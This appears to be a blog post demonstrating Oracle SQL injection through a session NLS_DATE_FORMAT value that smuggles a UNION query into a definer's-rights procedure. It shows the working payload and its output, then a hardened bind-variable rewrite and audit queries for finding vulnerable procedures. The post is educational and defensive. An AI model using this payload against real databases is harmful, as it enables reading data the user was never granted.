
Oracle SQL injection

Today, reading Tom's writing, I came across something very interesting: grant someone nothing but EXECUTE on a procedure, and they can still inject SQL through it. Be careful from now on. See my experiment below.

[oracle@aix ~]$ sqlplus anbob/anbob

SQL*Plus: Release 10.2.0.4.0 - Production on Tue Aug 30 18:52:41 2011

Copyright (c) 1982, 2007, Oracle.  All Rights Reserved.


Connected to:
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bit Production
With the Partitioning, OLAP, Data Mining and Real Application Testing options

SQL> select * from v$version;

BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.4.0 - 64bi
PL/SQL Release 10.2.0.4.0 - Production
CORE    10.2.0.4.0      Production
TNS for Linux: Version 10.2.0.4.0 - Production
NLSRTL Version 10.2.0.4.0 - Production

SQL> select * from all_users;

USERNAME                          USER_ID CREATED
------------------------------ ---------- -------------------
ZYY                                  1099 2011-08-30 11:41:03
GZPX_DB                              1070 2011-08-30 11:41:01
GIAF                                 1069 2011-08-30 11:41:01
DEAN_TRAIN                           1068 2011-08-30 11:41:01
...

75 rows selected.

SQL> select * from tab;

TNAME                          TABTYPE  CLUSTERID
------------------------------ ------- ----------
TEST                           TABLE
TESTA                          TABLE
TESTB                          TABLE
TESTBLOB                       TABLE
TESTC                          TABLE
TESTIMG                        TABLE
TESTKDR                        TABLE
TESTXY                         TABLE

8 rows selected.

SQL> create or replace procedure badboy( p_date in date )
  2  as
  3  l_rec   all_users%rowtype;
  4  c       sys_refcursor;
  5  l_query long;
  6  begin
  7  l_query := 'select * from all_users where created = ''' ||p_date ||'''';
  8  dbms_output.put_line( l_query );
  9  open c for l_query;
 10  for i in 1 .. 10
 11  loop
 12  fetch c into l_rec;
 13  exit when c%notfound;
 14  dbms_output.put_line( l_rec.username || '.....' );
 15  end loop;
 16  close c;
 17  end;
 18  /

Procedure created.

SQL> set serveroutput on;
SQL> exec badboy(sysdate);
select * from all_users where created = '2011-08-30 18:55:04'

PL/SQL procedure successfully completed.

SQL> grant execute on badboy to icme;

Grant succeeded.

SQL> conn icme/icme
Connected.
SQL> set serveroutput on

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = '2011-08-30 18:57:44'

PL/SQL procedure successfully completed.

SQL> alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';

Session altered.

SQL> exec anbob.badboy(sysdate);
select * from all_users where created = ''union select tname,0,sysdate from tab--'
TEST.....
TESTA.....
TESTB.....
TESTBLOB.....
TESTC.....
TESTIMG.....
TESTKDR.....
TESTXY.....

PL/SQL procedure successfully completed.

Ha, looks familiar? These are of course anbob's tables, and none of them were granted to icme. In the same way you can get the column names from all_column, and with those you can pull out part of a table's data...
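The injection works because `badboy` concatenates a DATE into the query text; Oracle converts it to a string implicitly using the caller's session `NLS_DATE_FORMAT`, and since the procedure runs with the owner's (definer's) rights, the injected `union` reads anbob's `tab`. The block below is an added example, not code from the original post, showing the same procedure hardened with a bind variable and invoker's rights, plus two heuristic queries a DBA can run to find similar procedures. It assumes the `anbob`/`icme` schemas and the `all_users` view from the post; the name `goodboy` is my own.

```sql
-- Added example (not from the original post). Hardened rewrite of badboy:
-- the date travels as a bind variable, so no session NLS setting can turn it
-- into SQL text, and AUTHID CURRENT_USER runs the query with the caller's
-- privileges rather than the owner's.
create or replace procedure goodboy( p_date in date )
authid current_user
as
    l_rec   all_users%rowtype;
    c       sys_refcursor;
    l_query varchar2(4000);
begin
    -- Placeholder :dt is bound, never concatenated.
    l_query := 'select * from all_users where created = :dt';
    dbms_output.put_line( l_query );
    open c for l_query using p_date;
    for i in 1 .. 10 loop
        fetch c into l_rec;
        exit when c%notfound;
        dbms_output.put_line( l_rec.username || '.....' );
    end loop;
    close c;
end;
/

-- If concatenation really cannot be avoided, pin the format on both sides so
-- the session NLS_DATE_FORMAT is never consulted (alternative to the bind above):
--   l_query := 'select * from all_users where created = to_date('''
--           || to_char(p_date, 'YYYY-MM-DD HH24:MI:SS')
--           || ''', ''YYYY-MM-DD HH24:MI:SS'')';

grant execute on goodboy to icme;

-- Re-run the post's attack against the hardened procedure as icme:
-- the printed SQL still contains only ":dt" and no rows from tab appear.
--   conn icme/icme
--   set serveroutput on
--   alter session set nls_date_format = '"''union select tname,0,sysdate from tab--"';
--   exec anbob.goodboy(sysdate);

-- Audit heuristic 1 (run as DBA): definer's-rights procedures executable by
-- other schemas. These run with the owner's privileges for every grantee.
select p.owner, p.object_name, g.grantee
from   dba_procedures p
join   dba_tab_privs  g
       on g.owner = p.owner and g.table_name = p.object_name
where  p.authid    = 'DEFINER'
and    g.privilege = 'EXECUTE'
and    g.grantee  <> p.owner
order  by p.owner, p.object_name;

-- Audit heuristic 2: source lines that build dynamic SQL by concatenation.
-- It only flags candidates for manual review; every || in a SELECT-looking
-- string is not necessarily injectable.
select owner, name, type, line, text
from   dba_source
where  type in ('PROCEDURE', 'FUNCTION', 'PACKAGE BODY', 'TRIGGER')
and    regexp_like(text, '\|\|')
and    regexp_like(text, '(select|insert|update|delete)\s', 'i')
order  by owner, name, line;
```

The bind-variable form is the real fix; `AUTHID CURRENT_USER` is defence in depth that limits what an injection could reach even if a concatenation slips in elsewhere. The explicit `to_char`/`to_date` variant is only for code that must build text, and it is safe solely because the format masks are hard-coded on both ends.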

This article currently has 2 comments (RSS). Comments are closed.

  1. Asuncion Studyvance | #1
    2011-12-21 at 14:37

    It’s onerous to find knowledgeable people on this topic, but you sound like you know what you’re talking about! Thanks

  2. 1fa9904fe | #2
    2011-09-02 at 16:27

    1fa9904fe fully supports the site owner. It is not easy for a blogger to update articles every day. I will visit your site often; the articles are well written. Bookmarked. Upvoted.